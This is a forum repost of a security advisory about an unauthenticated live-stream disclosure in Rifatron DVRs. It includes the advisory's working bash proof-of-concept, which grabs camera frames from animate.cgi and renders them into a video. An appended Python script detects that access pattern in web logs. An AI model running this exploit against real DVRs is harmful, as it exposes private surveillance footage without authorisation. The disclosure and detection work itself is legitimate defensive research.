
Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure

Discussion in the 'Vulnerabilities // Exploits // Patches' forum, started by zeroscience, 8 September 2019.

    Code:
    #!/bin/bash
    #
    #
    # Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
    #
    #
    # Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
    # Product web page: http://www.rifatron.com
    # Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
    #                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
    #                   Firmware: <=8.0 (000143)
    #
    #
    # Summary: Rifatron with its roots in Seoul, Korea has been supplying and
    # servicing the security market as a leading CCTV/video surveillance security
    # system manufacturer, specializing in stand-alone digital video recorder since
    # 1998. We are known for marking the first standalone DVR with audio detection
    # and 480 frames per second (fps) and have been focusing on highend products and
    # large projects in a variety applications and market. These include government
    # and public services, banking and finance, hotels and entertainment, retail
    # education, industrial and commercial sectors throughout Europe, Middle East,
    # the U.S. and Asia. Based on the accumulated know-how in the security industry,
    # Rifatron is trying its utmost for the technology development and customer
    # satisfaction to be the best security solution company in the world.
    #
    # Desc: The DVR suffers from an unauthenticated and unauthorized live stream
    # disclosure when animate.cgi script is called through Mobile Web Viewer module.
    #
    # Tested on: Embedded Linux
    #            Boa/0.94.14rc21
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #                             @zeroscience
    #
    #
    # Advisory ID: ZSL-2019-5532
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
    #
    #
    # 03.09.2019
    #
    
    #{PoC}
    #
    set -euo pipefail
    IFS=$'\n\t'
    if [ "$#" -ne 2 ]; then
        echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
        echo "Ex.: $0 10.9.8.7:65432 10"
        exit
    fi
    IP=$1
    CHANNEL=$2
    HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
    STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
    if [ "$STATUS" == "404" ]; then
        echo "Target not vulnerable!"
        exit
    fi
    echo "Collecting snapshots..."
    for x in {1..10};
        do echo -ne $x
        curl "$HOST" -o sequence-$x.jpg -#;
        sleep 0.6
        done
    echo -ne "\nDone."
    echo -ne "\nRendering video..."
    ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
    echo " done."
    echo -ne "\nRunning animation..."
    sleep 1
    cvlc video.mp4 --verbose -1 -f vlc://quit
    #
    #{/PoC}
    
    

    Zero Science Lab » Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
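
For defenders with one of the affected DVRs on their network, the sketch below (an added example, not part of the original post or the advisory) scans web access logs for clients pulling frames from `/cgi-bin/animate.cgi` in quick succession. The Common Log Format layout, the thresholds and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format is assumed here; it is not taken from the advisory.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# Frame request as described in the advisory: animate.cgi?<channel>
FRAME = re.compile(r'^/cgi-bin/animate\.cgi\?(?P<channel>\d+)$')

# Constructed sample input (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '198.51.100.23 - - [08/Sep/2019:10:15:00 +0200] "HEAD /mobile_viewer_login.html HTTP/1.1" 200 0',
    *[f'198.51.100.23 - - [08/Sep/2019:10:15:{s:02d} +0200] '
      f'"GET /cgi-bin/animate.cgi?10 HTTP/1.1" 200 14320' for s in range(1, 7)],
    '192.0.2.50 - - [08/Sep/2019:10:20:00 +0200] "GET /cgi-bin/animate.cgi?3 HTTP/1.1" 200 14011',
    '192.0.2.50 - - [08/Sep/2019:10:25:00 +0200] "GET /cgi-bin/animate.cgi?3 HTTP/1.1" 200 14011',
]

def find_frame_bursts(lines, min_hits=5, window=timedelta(seconds=10)):
    """Map client IP -> {"hits", "channels"} for clients that fetched at least
    min_hits frames (GET, status 200) from animate.cgi inside one time window."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "GET" or m["status"] != "200":
            continue
        frame = FRAME.match(m["uri"])
        if not frame:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[m["ip"]].append((ts, int(frame["channel"])))
    findings = {}
    for ip, events in hits.items():
        events.sort()
        start = best = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_hits:
            findings[ip] = {"hits": best, "channels": sorted({c for _, c in events})}
    return findings

if __name__ == "__main__":
    print(find_frame_bursts(SAMPLE_LOG))
```

Because the endpoint answers without authentication, a hit only shows that frames were served; compare the flagged addresses against the clients expected to use the Mobile Web Viewer.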
     
